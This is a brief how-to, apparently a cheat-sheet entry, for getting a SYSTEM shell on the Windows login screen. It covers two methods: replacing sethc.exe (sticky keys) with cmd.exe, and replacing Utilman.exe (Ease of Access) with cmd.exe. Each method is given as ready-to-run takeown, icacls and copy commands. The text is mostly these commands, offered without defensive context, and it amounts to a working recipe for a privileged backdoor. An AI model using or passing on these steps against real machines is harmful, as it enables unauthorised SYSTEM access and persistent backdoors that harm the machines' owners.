How to pop a SYSTEM shell on the Windows login screen using sticky keys
Pressing Shift 5 times triggers C:\Windows\System32\sethc.exe. On unencrypted Windows systems, replacing that with cmd.exe will let you get a shell running as SYSTEM from the login screen.
# Take ownership of the file (requires admin privileges).#takeown /f c:\Windows\System32\sethc.exe# Grant the current user permission to modify it.#icacls C:\Windows\System32\sethc.exe /grant $CURRENT_USER:F# Overwrite with cmd.exe.#copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
How to pop a SYSTEM shell on the Windows login screen using Utilman
Utilman.exe is the built-in Windows app to provide Ease of Access options from the lock screen. It’s launched by clicking on the Ease of Access button.
# Take ownership of the file (requires admin privileges).#takeown /f C:\Windows\System32\Utilman.exe# Grant the current user permission to modify it.#icacls C:\Windows\System32\Utilman.exe /grant $CURRENT_USER:F# Overwrite with cmd.exe.#copy C:\Windows\System32\cmd.exe C:\Windows\System32\Utilman.exe